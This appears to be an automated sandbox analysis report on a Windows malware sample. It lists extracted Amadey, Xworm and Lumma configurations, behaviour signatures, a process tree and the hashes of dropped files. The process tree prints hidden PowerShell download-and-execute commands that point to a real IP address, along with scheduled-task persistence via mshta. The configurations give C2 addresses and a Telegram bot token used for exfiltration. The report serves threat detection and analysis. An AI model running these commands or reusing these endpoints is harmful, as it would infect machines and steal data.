Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20250217-en locale:en-us os:windows10-2004-x64 system
  • submitted
    08/03/2025, 06:49

General

  • Target

    4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe

  • Size

    938KB

  • MD5

    05fdff6b612497f1292bd7c12fd54d00

  • SHA1

    611df7ad895719e22ccdfc8068e7e93afd2c2b7b

  • SHA256

    4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113

  • SHA512

    3a522cb7aa14cbf32864b489c4c7c5ab700456ab90195dd927dcd3d08a30541f60941660a7d5252b5d57ec0f8dae4e90532e8d4e24b5443aa60db327697d73ac

  • SSDEEP

    24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:YTvC/MTQYxsWR7a06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

mCc32z4xar49VjIz

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7966191014:AAHmIi9PixWQP2mPV3M19pmD0gl2NMjcjIQ/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

lumma

C2


Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Uses the powershell.exe command.

  • Downloads MZ/PE file 11 IoCs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe
    "C:\Users\Admin\AppData\Local\Temp\4b6809eadff24e320c31e9bbef3a6bd66ef7861ee9280bff726d9be05ee92113.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn N0geema6qnL /tr "mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn N0geema6qnL /tr "mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4884
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:392
        • C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE
          "C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4260
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe
              "C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3920
            • C:\Users\Admin\AppData\Local\Temp\10136710101\8PSVPpr.exe
              "C:\Users\Admin\AppData\Local\Temp\10136710101\8PSVPpr.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5016
            • C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe
              "C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2760
            • C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe
              "C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn CAluRmaerC8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4012
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn CAluRmaerC8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4356
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4388
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1100
                  • C:\Users\Admin\AppData\Local\TempJGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE
                    "C:\Users\Admin\AppData\Local\TempJGPCEPWWTXXZ1DZZDDSYMYV8ELBPUSKR.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3552
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10136740121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1816
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4356
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1712
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2296
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:760
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3816
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:560
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:740
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "wnRvKmaDIpx" /tr "mshta \"C:\Temp\egCZvFOo2.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2604
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\egCZvFOo2.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:4884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2976
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3752
            • C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe
              "C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2996
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:1184
            • C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe
              "C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4248
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:968
            • C:\Users\Admin\AppData\Local\Temp\10136770101\256e6c9398.exe
              "C:\Users\Admin\AppData\Local\Temp\10136770101\256e6c9398.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1552
            • C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe
              "C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1196
              • C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe
                "C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:812
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 800
                7⤵
                • Program crash
                PID:3028
  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1864
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1196 -ip 1196
    1⤵
    PID:2340
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2752
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:3524


    Downloads

    • C:\Temp\egCZvFOo2.hta

      Filesize

      779B

      MD5

      39c8cd50176057af3728802964f92d49

      SHA1

      68fc10a10997d7ad00142fc0de393fe3500c8017

      SHA256

      f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

      SHA512

      cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      25604a2821749d30ca35877a7669dff9

      SHA1

      49c624275363c7b6768452db6868f8100aa967be

      SHA256

      7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

      SHA512

      206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VNL8ZX03\service[1].htm

      Filesize

      1B

      MD5

      cfcd208495d565ef66e7dff9f98764da

      SHA1

      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

      SHA256

      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

      SHA512

      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VNL8ZX03\soft[1]

      Filesize

      987KB

      MD5

      f49d1aaae28b92052e997480c504aa3b

      SHA1

      a422f6403847405cee6068f3394bb151d8591fb5

      SHA256

      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

      SHA512

      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      7acd08094fe2db26f02371584ba74ed2

      SHA1

      e5567848ee2412ad9e6e2f1126a3a8afd70c0589

      SHA256

      23928549e2942a18b2cb0d831de7399676fcdff65ff08c7f88ee1945c8a19f2d

      SHA512

      c9a41fd96f90229c51307ce5d6db03d79dc927473658c9dc5c88be4a657c791a97c2e4a98350f34fd6500c5181a4101cf7b1e3dc72823b072042e00bd7ad0de7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      4d711b6c23132bde38cd30a9c4b75984

      SHA1

      6915d0b5654c5c08508fccc995294980a5a9ec75

      SHA256

      d3402485cd3ee5598008490635c1ea324ad446e3d16ea3a30ebadab6ef6cc69e

      SHA512

      f2bd2fe88fe5fa8695061302fb50229b7541d19045428e02a27f122001c7d8c52030b9c4c1e66f08b166aa21ca045b2ed24898fcedd981180fdbf28863332531

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      067ecb3a0c886ff97b174ad6a3e6d84f

      SHA1

      805a5ef8e7ae23a1ddc60880c70fc80e226c5b13

      SHA256

      2eeae1911d9682bd9310d5643a689519ce70ef876e2eba4337765d399f2907d6

      SHA512

      af30dabdc89e91ab6e762e0a6c526a701c6a438db7c204f3f1b0c0b8b4fe13bdfc415b3cf807cc0c86ece7cbd066797f912a6dd58b8507da0694be2471dd0f32

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      751cfccc5f687b05b3cc72e168225124

      SHA1

      a516c411e99fe6529536ca0623ddff936b68698e

      SHA256

      ab750d4ca4c3cb44f79857bc825cd6166caa31ddfdf0aaeaf7c48d6d126c2713

      SHA512

      47ae0de66669ee7f2d4a74211c465cf5724beb582111ae4328bfbec9ad193ddb15ac62152b15c2dad87e34c7b144a2aeca42c4404ee23f9a0170baab07a122ac

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      514453a5411bcd084bf7229b21a084c8

      SHA1

      21122129dfa2e6a68e51988215f1c9300d35dbc1

      SHA256

      8b86d169b4f4c0d24251b423c58c627561aa90e2f0c7710f51ea55d7e0373797

      SHA512

      9e1535c4b467f55027535a5d0499b137dcdef20a190b43e766f156927ae16ab99006cbd8a584d0835ca3acd9504bb50d800c0ea015489552bf9ef64d22848687

    • C:\Users\Admin\AppData\Local\TempCJBMLE7NMWQPKI3LMJPO4MDXIGPUEBB6.EXE

      Filesize

      1.9MB

      MD5

      997dfb98c1ced9c1dd09184542a55c4e

      SHA1

      ecd413c5638ee69c504691209eaff90a231ad1f1

      SHA256

      edd0944a6e3795af01734074651575e5e70218691e6c01c0f6c240a2582a416a

      SHA512

      3264f5248daad05c6f591da4292b5f7c8ed24dc3542f63983a3a5de8e89aac72531fb57fa19d0ff2d674494174ad3d3e4c4ac690b306f8fe6cadb508b0b94e42

    • C:\Users\Admin\AppData\Local\Temp\10136700101\8PSVPpr.exe

      Filesize

      206KB

      MD5

      161a7aadcaea3ec926f673f8aaca6bdd

      SHA1

      f599a713e7af8631b310c0ceb70f51599b101692

      SHA256

      75e0f5f7c05f393ce8e90db7b88bde00e7d2323e02e7bb0f0bd8f7df3afea726

      SHA512

      f24b737120c93ee258790c13f9487293c97cb24b33b347a5b84530c7784e2c7eb2be0e67721ef988007ac2914611eabb489888a1054968f3ff1e0e502b4c1ef5

    • C:\Users\Admin\AppData\Local\Temp\10136720101\ad5d42979f.exe

      Filesize

      2.9MB

      MD5

      a8de283bc6aa92aa304f25800c8f5d4b

      SHA1

      04dd62343ea6d852cfb22f872a6a7db7ba3c6dd2

      SHA256

      d7973b0a237cdca8cdcc8343fba8f123e8a2f119bf5839ad6914d2629c627a78

      SHA512

      272352908f2f748d2c21f578a63285cd9cf30b8747ee0caa4cd4565e4674027a872f863ed1f8d64b196bebfd49fe48ffb6c600a426d11339569c68f6da243543

    • C:\Users\Admin\AppData\Local\Temp\10136730101\96ded32a25.exe

      Filesize

      938KB

      MD5

      759c7df2729a11dc7221153aa97225e5

      SHA1

      d35dbd602bf8e033131d236133b6f90a6cc3c9b2

      SHA256

      74a844fa7a9fb28cdba19006a07f92823c3673134cf69c4713e10590ee05cec8

      SHA512

      0faa312dad58cecda4df569a69b32b20d40dfbf1248aeb607fd52672974cb740fa4ff1014489b6a52b11c71476a0bb2d985688535835180adb87583942fc9002

    • C:\Users\Admin\AppData\Local\Temp\10136740121\am_no.cmd

      Filesize

      1KB

      MD5

      cedac8d9ac1fbd8d4cfc76ebe20d37f9

      SHA1

      b0db8b540841091f32a91fd8b7abcd81d9632802

      SHA256

      5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

      SHA512

      ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

    • C:\Users\Admin\AppData\Local\Temp\10136750101\671f8ba606.exe
      Filesize: 3.8MB
      MD5: a9cee07081907d6abd6f187bd1cfd388
      SHA1: ab4dd2e23ebca1e4b6099b9021385088dc7893fc
      SHA256: c6e5b5bb4b3d84d4df5e6eddca5e643f7be503768ff97929018650d958178e5f
      SHA512: 1a518bcbc2c58f5e215e3371e0a8ad2928d8c638eeef0aa76f0707c53bd0fc2db0649928f3c4c91f5c813a9134d6f8927bd667ec3f46040f898f45f56ad88562

    • C:\Users\Admin\AppData\Local\Temp\10136760101\f8e16e10e4.exe
      Filesize: 4.5MB
      MD5: df4574c832b87b0ff73bc26c06160fb6
      SHA1: f468991945ee6fc2b37328e9bb316b7d3fc673c8
      SHA256: bc2d3d4107f3cf9d15e1b7a49ab3fd1b8f2f9d443b63a827cf68374028546df6
      SHA512: c21f3b69a4e6261097a86cea0c001577307e80be8911b3b83d8d0a609f73432cfa1f113e138c6246108baa2a55c3cb6e29ef63ec5397956f8718215b348bc534

    • C:\Users\Admin\AppData\Local\Temp\10136770101\256e6c9398.exe
      Filesize: 1.8MB
      MD5: 66a113b5629594e4795c16901ff623b8
      SHA1: b17ba4b805512d8690b943749ec56a448caafdf4
      SHA256: 661f3a05a98ee9479e4a8076e8dae67e302043a5fb0e356fa2ac85e70699e1a0
      SHA512: e43fe7318f661d34f62b170f9507b0bcbc25dc0b28b617c2cc295b4788d546717b356c03f84202f5c243ca94640da22dcd4d99b94a2f18224c7d469ab9eb6b78

    • C:\Users\Admin\AppData\Local\Temp\10136780101\4649404ca9.exe
      Filesize: 364KB
      MD5: 9dd7f35baa732ab9c19737f7574f5198
      SHA1: af2f9db558e5c979839af7fc54a9c6f4c5f1945c
      SHA256: ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6
      SHA512: ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91

    • C:\Users\Admin\AppData\Local\Temp\E6Tx48AwG.hta
      Filesize: 717B
      MD5: b8244f3dd240db9491094f5eb1c6c106
      SHA1: b71ad3f1ecd74ad8c68acd7181e7e9efe49285b5
      SHA256: d9f9ef17cfe39cbcf62eb6ed15c748fb3e7056b34163c4cc93dc2446c4da42a0
      SHA512: 70e8f5594c42ea88caa4458646f1420b106109d48668ddd8674c0e3fec25371ee4af6e2c00b76524408b0add214e0d98ff8674e9f77b8074f7cfdd08827b150f

    • C:\Users\Admin\AppData\Local\Temp\NkKUymTZB.hta
      Filesize: 717B
      MD5: 2cbe2a394e96f3a94ef8466684a88e35
      SHA1: 773b6cbd9b4349db150fc126d12ae636a405bdff
      SHA256: f348f9161e51944a2aa73b7b1849d7b5573a60fdb9e8f0f1ed9690e3338c7ecb
      SHA512: 264655eadddc43f3ff409514af253ac3b3b61436748a2f46925c6c43ac4d8c6daf754971fb06b17cd2240bc56d3b27105c81c6ccffe95bf479f849252455a451

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iznxw05w.lfs.ps1
      Filesize: 60B
      MD5: d17fe0a3f47be24a6453e9ef58c94641
      SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
